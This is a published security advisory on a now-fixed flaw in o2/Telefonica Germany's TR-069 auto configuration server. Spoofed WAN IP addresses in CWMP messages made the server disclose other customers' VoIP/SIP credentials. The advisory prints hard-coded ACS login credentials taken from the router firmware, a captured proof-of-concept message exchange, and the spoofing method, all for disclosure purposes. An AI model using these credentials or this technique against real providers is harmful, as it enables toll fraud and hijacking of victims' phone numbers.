Advisory: o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials The o2 Auto Configuration Server (ACS) discloses VoIP/SIP credentials of arbitrary customers when receiving manipulated CWMP packets. These credentials can then be used by an attacker to register any VoIP number of the victim. This enables the attacker to place and receive calls on behalf of the attacked user. ### Details - Product: o2 DSL Auto Configuration Server - Vulnerability Type: Information Disclosure - Security Risk: high - Vendor URL: `https://o2online.de/` - Vendor Status: fixed - Advisory URL: `https://www.redteam-pentesting.de/advisories/rt-sa-2015-005` - Advisory Status: published - CVE: GENERIC-MAP-NOMATCH - CVE URL: `https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH` ### Introduction TR-069 (Technical Report 069) is a Broadband Forum technical specification entitled "CPE WAN Management Protocol" (CWMP). It defines an application layer protocol for remote management of end-user devices. (from Wikipedia) A more technical introduction to TR-069 can be found in a deck of slides which the Interoperability Laboratory at the University of New Hampshire has published on that topic (). ### More Details The German Internet Service Provider o2 uses the TR-069 protocol for the provisioning of Customer Premises Equipment (CPE). Among other settings, VoIP/SIP credentials are transferred and VoIP telephony is set up. In our setup, an AVM FRITZ!Box 7490 was monitored during the initial autoconfiguration process. During that process, several CWMP messages are exchanged. These CWMP messages are transferred via HTTPS as SOAP requests and replies. The HTTPS connection is always established by the CPE which connects to the Auto Configuration Server (ACS). According to the CWMP, the CPE may do so on the occasion of several events, including, but not limited to: - BOOTSTRAP - first contact between CPE and ACS - BOOT - when CPE has rebooted - PERIODIC - after a period of time, defined by the ACS - CONNECTION REQUEST - ACS signals a connection request to the CPE via a second HTTP channel The "CONNECTION REQUEST" is the only event that can be triggered by the ACS. To do so, the ACS establishes an unencrypted HTTP connection to the CPE and authenticates via HTTP basic access authentication with a "ConnectionRequestUsername" and a "ConnectionRequestPassword". No further data is exchanged on that channel. Once the CPE has verified the credentials, it then initiates the real CWMP conversation by sending a CWMP-Inform message to the pre-defined ACS. The connection initiated by the CPE is TLS-secured and the CPE provides a username (ManagementServer.Username) and a password (ManagementServer.Password) to authenticate itself towards the ACS. A typical CWMP conversation (including the "CONNECTION REQUEST" event) is depicted below: > .----------------Connection Request---------------. \] > \| \| \] > v \| \] ----------. .-------- \]---\> HTTP \| \| \] \| \| \] ----' \| \| ACS \] \| \| \| \| \| \|----. \] ----\> \| ---Inform------------------------\> \| \| \] \| \<---InformResponse---------------- \| \| \] \| \| \| \] \| ---\[empty\]-----------------------\> \| \| \] \| \<---SetParameterValues------------ \| \| \] \| \| \| \] \| ---SetParameterValuesResponse----\> \]---\> CWMP \| \<---SetParameterValues------------ \| 443\| \] (HTTPS) \| \| \| \] CPE \| \[...\] \| \| \] \| \| \| \] \| ---SetParameterValuesResponse----\> \| \| \] \| \<---\[empty\]----------------------- \| \| \] \| \| \| \] During our research, it was observed that the ACS URL as well as credentials for the initial connection to the ACS are hard-coded. On a stock AVM FRITZ!Box, running the firmware version 6.20, these can be found in the file ./providers/otwored/tr069.cfg which is part of the archive /etc/default.Fritz_Box_HW185/avm/providers-049.tar. For o2/Telefonica these credentials are: tr069cfg { enabled = yes; igd { DeviceInfo { ProvisioningCode = ""; } managementserver { url = "`https://acs.o2online.de/nbbs/tr69`"; username = "00040E-000000000000"; password = "o2acs"; URLAlreadyContacted = no; PeriodicInformEnable = yes; PeriodicInformInterval = 3600; } } FirmwareDownload { enabled = yes; enabled_converted = yes; } ACS_SSL { verify_server = yes; trusted_ca_file = "/etc/default/avm/root_ca.pem"; } Download_SSL { verify_server = yes; trusted_ca_file = "/etc/default/avm/root_ca.pem"; } } To ease the interaction with the ACS, a minimal TR-069 client was implemented. With this rogue client it was possible to simulate the behaviour of an AVM FRITZ!Box 7490 during the initial autoconfiguration process. Thus, in the following description, the word "CPE" may be replaced equally with "rogue client". After the CPE connects to the ACS (see \[msg00\] in section Proof of Concept), it gets configured to accept new credentials for incoming connection requests: - InternetGatewayDevice.ManagementServer.ConnectionRequestUsername \* InternetGatewayDevice.ManagementServer.ConnectionRequestPassword (see \[msg03\]) The CPE is now capable of receiving connection requests from the ACS. After several seconds, the ACS initiates a connection request and the CPE starts a CWMP conversation (see \[msg06\]). During that conversation, the ACS (ACS A) provides a new ACS URL (ACS B) together with a new set of login credentials for ACS B: - InternetGatewayDevice.ManagementServer.URL - InternetGatewayDevice.ManagementServer.Username - InternetGatewayDevice.ManagementServer.Password - InternetGatewayDevice.ManagementServer.ConnectionRequestUsername \* InternetGatewayDevice.ManagementServer.ConnectionRequestPassword (see \[msg09\]) Finally, the CPE is rebooted. From that point in time, all CWMP conversation is directed to ACS B. On the occasion of the "BOOT" event, the CPE connects to ACS B (see \[msg12\]) and receives the following settings: - InternetGatewayDevice.ManagementServer.PeriodicInformEnable - InternetGatewayDevice.ManagementServer.PeriodicInformInterval \* InternetGatewayDevice.ManagementServer.PeriodicInformTime (see \[msg15\]) After several seconds, again, the CPE receives a connection request. It connects to ACS B again (see \[msg18\]) and receives the VoIP credentials for all telephone numbers, that are assigned to the customer: - InternetGatewayDevice.Services.VoiceService.1. VoiceProfile.1.Line.1.DirectoryNumber - InternetGatewayDevice.Services.VoiceService.1. VoiceProfile.1.Line.1.SIP.AuthUserName - InternetGatewayDevice.Services.VoiceService.1. VoiceProfile.1.Line.1.SIP.AuthPassword - InternetGatewayDevice.Services.VoiceService.1. VoiceProfile.1.Line.1.SIP.RegistrarServer \* InternetGatewayDevice.Services.VoiceService.1. VoiceProfile.1.Line.1.SIP.OutboundProxy (see \[msg23\]) The first digits of the AuthPassword are taken from the phone number. In summary, the CPE has received VoIP credentials while it only supplied hard-coded login credentials for ACS A. As a result, the ACS must have identified the CPE by the WAN IP address. It was further determined that the ACS relies on the WAN/IPv4 address, which is specified as the parameter - InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1. WANIPConnection.1.ExternalIPAddress in the CWMP-Inform messages (see \[msg00,06,12,18\]). These CWMP-Inform messages can be manipulated by an attacker and therefore may contain arbitrary WAN IP addresses. If an attacker sends such spoofed CWMP-Inform messages during the whole two-step auto-provisioning process, the ACS returns VoIP credentials which are assigned to the IP address specified by the attacker. Additionally, any VoIP number issued by o2 may be registered from any o2 DSL account. Even if the number is already registered by the legit customer's CPE, an attacker may register the number a second time. Incoming calls will be directed to both clients and may be answered by either of them. Furthermore, it allows an attacker to place and receive phone calls on behalf of any other customer. In consequence, the victim will be charged with any costs resulting from the abuse. ### Proof of Concept As a proof of concept, the CWMP conversation that was captured during the autoprovisioning of an AVM FRITZ!Box 7490 (Firmware 6.20) is given below. Each message is the body of an HTTPS POST request (to the ACS) or an HTTPS POST reply (from the ACS). Some messages have been wrapped to obtain better readability. Communication with ACS A: ``` [msg00] CPE -> ACS A: --------------------- 100 AVM 00040E FRITZ!Box 0896D776FAA2 1 BOOT 0 BOOTSTRAP 1 2014-09-08T18:27:32+02:00 0 InternetGatewayDevice.DeviceSummary InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1, ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2, DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1, Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1, FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1, VolumeConfig:1) InternetGatewayDevice.DeviceInfo.HardwareVersion FRITZ!Box 7490 InternetGatewayDevice.DeviceInfo.SoftwareVersion 113.06.20 InternetGatewayDevice.DeviceInfo.SpecVersion 1.0 InternetGatewayDevice.DeviceInfo.ProvisioningCode InternetGatewayDevice.ManagementServer.ParameterKey InternetGatewayDevice.ManagementServer.ConnectionRequestURL http://78.48.x.x:8089/869f7018 InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1. WANIPConnection.1.ExternalIPAddress 78.48.x.x [msg01] CPE <- ACS A: --------------------- 100 1 [msg02] CPE -> ACS A: --------------------- [empty] [msg03] CPE <- ACS A: --------------------- null0 InternetGatewayDevice.ManagementServer.PeriodicInformEnable 1 InternetGatewayDevice.ManagementServer. ConnectionRequestUsername 0896D776FAA2 InternetGatewayDevice.ManagementServer. ConnectionRequestPassword 57d29f69eca7b5ca484e4644bf9720 InternetGatewayDevice.ManagementServer. PeriodicInformInterval 200 null [msg04] CPE -> ACS A: --------------------- null0 0 [msg05] CPE <- ACS A: --------------------- [empty] [msg06] CPE -> ACS A: --------------------- null0 AVM 00040E FRITZ!Box 0896D776FAA2 6 CONNECTION REQUEST 1 2014-09-08T18:27:34+02:00 0 InternetGatewayDevice.DeviceSummary InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1, ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2, DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1, Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1, FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1, VolumeConfig:1) InternetGatewayDevice.DeviceInfo.HardwareVersion FRITZ!Box 7490 InternetGatewayDevice.DeviceInfo.SoftwareVersion 113.06.20 InternetGatewayDevice.DeviceInfo.SpecVersion 1.0 InternetGatewayDevice.DeviceInfo.ProvisioningCode InternetGatewayDevice.ManagementServer.ParameterKey null InternetGatewayDevice.ManagementServer.ConnectionRequestURL http://78.48.x.x:8089/869f7018 InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1. WANIPConnection.1.ExternalIPAddress 78.48.x.x [msg07] CPE <- ACS A: --------------------- null0 1 [msg08] CPE -> ACS A: --------------------- [empty] [msg09] CPE <- ACS A: --------------------- 393158460 InternetGatewayDevice.ManagementServer.URL https://hdm.o2online.de:443/cwmpWeb/CPEMgt InternetGatewayDevice.ManagementServer.Username 0896D776FAA2 InternetGatewayDevice.ManagementServer.Password 1410193655111a InternetGatewayDevice.ManagementServer. ConnectionRequestUsername 0896D776FAA2 InternetGatewayDevice.ManagementServer. ConnectionRequestPassword 1410193655111a 39315846 [msg10] CPE -> ACS A: --------------------- 393158460 0 [msg11] CPE <- ACS A: --------------------- initializeSession:null ``` Communication with ACS B: ``` [msg12] CPE -> ACS B: --------------------- 393158460 AVM 00040E FRITZ!Box 0896D776FAA2 1 BOOT 0 BOOTSTRAP 1 2014-09-08T18:27:35+02:00 0 InternetGatewayDevice.DeviceSummary InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1, ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2, DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1, Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1, FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1, VolumeConfig:1) InternetGatewayDevice.DeviceInfo.HardwareVersion FRITZ!Box 7490 InternetGatewayDevice.DeviceInfo.SoftwareVersion 113.06.20 InternetGatewayDevice.DeviceInfo.SpecVersion 1.0 InternetGatewayDevice.DeviceInfo.ProvisioningCode InternetGatewayDevice.ManagementServer.ParameterKey 39315846 InternetGatewayDevice.ManagementServer.ConnectionRequestURL http://78.48.x.x:8089/869f7018 InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1. WANIPConnection.1.ExternalIPAddress 78.48.x.x [msg13] CPE <- ACS B: --------------------- 393158460 1 [msg14] CPE -> ACS B: --------------------- [empty] [msg15] CPE <- ACS B: --------------------- 393158490 InternetGatewayDevice.ManagementServer.PeriodicInformEnable 1 InternetGatewayDevice.ManagementServer. PeriodicInformInterval 38888 InternetGatewayDevice.ManagementServer.PeriodicInformTime 2014-09-08T10:49:21+1:00 39315849 [msg16] CPE -> ACS B: --------------------- 393158490 0 [msg17] CPE <- ACS B: --------------------- [empty] [msg18] CPE -> ACS B: --------------------- 393158490 AVM 00040E FRITZ!Box 0896D776FAA2 6 CONNECTION REQUEST 1 2014-09-08T18:27:36+02:00 0 InternetGatewayDevice.DeviceSummary InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1, ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2, DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1, Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1, FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1, VolumeConfig:1) InternetGatewayDevice.DeviceInfo.HardwareVersion FRITZ!Box 7490 InternetGatewayDevice.DeviceInfo.SoftwareVersion 113.06.20 InternetGatewayDevice.DeviceInfo.SpecVersion 1.0 InternetGatewayDevice.DeviceInfo.ProvisioningCode InternetGatewayDevice.ManagementServer.ParameterKey 39315849 InternetGatewayDevice.ManagementServer.ConnectionRequestURL http://78.48.x.x:8089/869f7018 InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1. WANIPConnection.1.ExternalIPAddress 78.48.x.x [msg19] CPE <- ACS B: --------------------- 393158490 1 [msg20] CPE -> ACS B: --------------------- [empty] [msg21] CPE <- ACS B: --------------------- 393158500 InternetGatewayDevice.DeviceInfo.ProvisioningCode 20140908xxxxxx-0896D776FAA2-78.48.x.x InternetGatewayDevice.Services.VoiceService.1.Capabilities. X_AVM-DE_UsePSTN 0 39315850 [msg22] CPE -> ACS B: --------------------- 393158500 0 [msg23] CPE <- ACS B: --------------------- 393158501 InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Enable Enabled InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.Enable Enabled InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.SIP.X_AVM-DE_UseAuthUsername 0 InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.SIP.X_AVM-DE_CLIRType 5 InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.PSTNFailOver 0 InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.DTMFMethod RFC2833 InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.SIP.OutboundProxy sip.alice-voip.de InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.SIP.UserAgentDomain sip.alice-voip.de InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.SIP.RegistrarServer sip.alice-voip.de InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.SIP.ProxyServer sip.alice-voip.de InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.SIP.AuthPassword 0241463xxxxxxxxx InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.DirectoryNumber 463xxxxx InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.SIP.AuthUserName 49241463xxxxx 39315850 [msg24] CPE -> ACS B: --------------------- 393158501 0 [msg25] CPE <- ACS B: --------------------- [empty] ``` ### Workaround o2 implemented countermeasures that prevent attackers from spoofing a victim's IP address in CWMP messages. This prevents attackers from retrieving arbitrary o2 customers' VoIP credentials. ### Fix The CPE needs to be properly authenticated when communicating with the ACS. One option of doing so would be to provide the password of the DSL connection. This password is already known to the CPE as it has been entered manually by the customer during the initial setup process. ### Security Risk This vulnerability allows the unauthorised usage of foreign VoIP telephone numbers. The victim will be charged with all costs resulting from fraudulent phone calls. Furthermore, an attacker may answer phone calls on behalf of the victim. Customers have no means of defending oneself from such an attack. Chances are that the attack will be noticed only by customers who regularly check their invoice. The vulnerability is therefore considered to pose a high risk. ### Timeline - 2014-09-08 - Potential vulnerability discovered - 2014-09-20 - Vulnerability verified - 2014-10-17 - ISP was notified about the vulnerability - 2014-10-17 - ISP implemented first countermeasures - 2014-10-24 - ISP wants to investigate further - 2014-11-28 - ISP needs more time, depends on hardware manufacturer - 2015-01-23 - ISP is still investigating, wants to permanently solve the problem - 2015-03-31 - ISP is still working on the problem, asks for more time - 2015-06-12 - ISP wants to notify the proper German authorities about the problem first while working on a solution - 2015-06-18 - ISP notified German authorities (Bundesnetzagentur, BfDI, BSI) - 2016-01-08 - Advisory released ### RedTeam Pentesting GmbH RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: